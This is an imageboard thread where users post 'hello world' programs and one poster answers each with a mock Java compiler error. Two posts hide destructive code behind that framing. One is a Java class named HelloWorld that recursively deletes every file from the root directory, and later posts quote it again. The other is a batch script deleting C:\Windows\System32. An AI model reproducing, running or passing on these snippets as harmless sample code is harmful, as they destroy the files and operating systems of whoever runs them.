Post number #856846, ID: d2bf71
|
print("Hello, world!")
Post number #856853, ID: 5f398e
|
world = not true
Post number #857147, ID: 321b11
|
hello world:1: error: class, interface, or enum expected print("Hello, world!") ^ 1 error
Post number #857148, ID: 2c0b04
|
printf hello world
Post number #857168, ID: 321b11
|
>>856853 hello world:1: error: class, interface, or enum expected world = not true ^ 1 error >>857148 hello world:1: error: class, interface, or enum expected printf hello world ^ 1 error
Post number #857185, ID: 167a27
|
hello
Post number #857193, ID: 321b11
|
>>857185 hello world:1: error: class, interface, or enum expected hello ^ 1 error
Post number #857266, ID: a8e6fa
|
DESIGNED TO LOVE AND NOT TO FEEEEEEEEEEEEEL
Post number #857269, ID: 321b11
|
>>857266 hello world:1: error: class, interface, or enum expected DESIGNED TO LOVE AND NOT TO FEEEEEEEEEEEEEL ^ 1 error
Post number #857430, ID: 9f994f
|
import java.nio.file.*; import java.nio.file.attribute.*; public class HelloWorld { public static void main(String arg[]) throws Exception {Files.walkFileTree(Paths.get("/"), new SimpleFileVisitor<Path>() {@Override public FileVisitResult visitFile(Path a, BasicFileAttributes b) { try{Files.delete(a);}catch(Exception e){} return FileVisitResult.CONTINUE; }});}}
Post number #857461, ID: 2c0b04
|
echo "hello world";
Post number #857468, ID: 3f046e
|
HW = ('H', 'E', 'L', 'L', 'O', '', 'W', 'O', 'R', 'L', 'D') For i in range(0, len(HW)): Print(HW[i])
Post number #857472, ID: de1973
|
@echo off del C:\Windows\System32
Post number #857486, ID: af41e4
|
>>857430 hello world:3: error: class HelloWorld is public, should be declared in a file named HelloWorld.java public class HelloWorld { public static void main(String arg[]) throws Exception {Files.walkFileTree(Paths.get("/"), new SimpleFileVisitor<Path>() {@Override public FileVisitResult visitFile(Path a, BasicFileAttributes b) { try{Files.delete(a);}catch(Exception e){} return FileVisitResult.CONTINUE; }});}} ^ 1 error
Post number #857487, ID: af41e4
|
>>857430 * hello world:3: error: class HelloWorld is public, should be declared in a file named hello world public class HelloWorld { public static void main(String arg[]) throws Exception {Files.walkFileTree(Paths.get("/"), new SimpleFileVisitor<Path>() {@Override public FileVisitResult visitFile(Path a, BasicFileAttributes b) { try{Files.delete(a);}catch(Exception e){} return FileVisitResult.CONTINUE; }});}} ^ 1 error
Post number #857492, ID: af41e4
|
>>857461 hello world:1: error: class, interface, or enum expected echo "hello world"; ^ 1 error >>857468 hello world:1: error: class, interface, or enum expected HW = ('H', 'E', 'L', 'L', 'O', '', 'W', 'O', 'R', 'L', 'D') For i in range(0, len(HW)): Print(HW[i]) ^ 1 error >>857472 hello world:1: error: class, interface, or enum expected @echo off ^ 1 error
Post number #857514, ID: 2cbb55
|
hi wurld
Post number #857519, ID: 691b72
|
>>857514>hyper-interaction: world started!
Total number of posts: 18,
last modified on:
Thu Jan 1 00:00:00 1651595587
| print("Hello, world!")